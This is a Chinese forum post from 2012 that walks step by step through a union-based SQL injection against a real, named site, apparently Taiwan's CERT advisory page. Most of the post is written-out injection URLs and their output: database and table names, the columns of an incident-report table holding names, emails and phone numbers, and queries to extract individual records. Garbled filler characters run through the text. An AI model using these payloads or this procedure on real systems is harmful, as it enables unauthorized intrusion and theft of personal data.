1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
0 [: U* S1 V! ?0 ^6 D e1 P2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解/ t9 V* _- p2 n; Y9 P! s2 {% |4 N
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--- t- T; D: y2 i/ X; T, `& x
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
' ~% U9 j- I- U数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
( E- U5 Y; ~# K W4.判断有没有写权限
4 \ ?1 E8 L9 {9 h9 Q. L( R! D" rhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限4 l C. W D1 H6 M1 U2 ^) X+ W
没办法,手动猜表啦! l; r* N, \4 `6 a2 F* Y1 S& `
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
1 f. g& T3 k& y0 Y6 A但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下5 h' b9 D; {7 W. {9 z G" s
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--2 b2 }2 O4 P1 H) d+ M; \5 C; D7 F2 s
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
( y/ N8 P6 X5 C$ u, ~! A1 sinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
c6 n6 S6 [$ f# u# m. ]: B: W2 O6.爆表,爆的是twcert库3 {. ^- b$ e0 e3 L3 T4 y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
- _/ J+ R9 Z3 _1 t爆出如下表
6 J o* w) P( ?1 o0 T A- d) Bdownloadfile,irsys,newsdata,secrpt,secrpt_big5- ?+ z" Q0 K4 n
7.爆列名,这次爆的是irsys表" h/ |- B8 Q& m6 I( | W* _1 L4 o- M
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--# }0 m* c) Z, U2 O+ ~) G8 h# i
爆出如下列
% b: B, g- }; hir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status9 n6 V0 ?- G& M. y: K
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
p; L; L2 _% _) @/ Vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--% \ A" T( W" x2 A6 q; w. a% h
返回是3,说明每个列里有3个地段$ P9 ]+ C# T m" C3 D: h
9.爆字段内容" q& L) t1 k- I8 A3 S( O# l; Y
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
% \: U0 J8 }% Y0 G: g3 R" R6 A& a爆出name列的第一个字段的内容
/ e7 _7 z7 v8 k2 d' z& vhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
, f, J- d. e+ [ [4 q爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对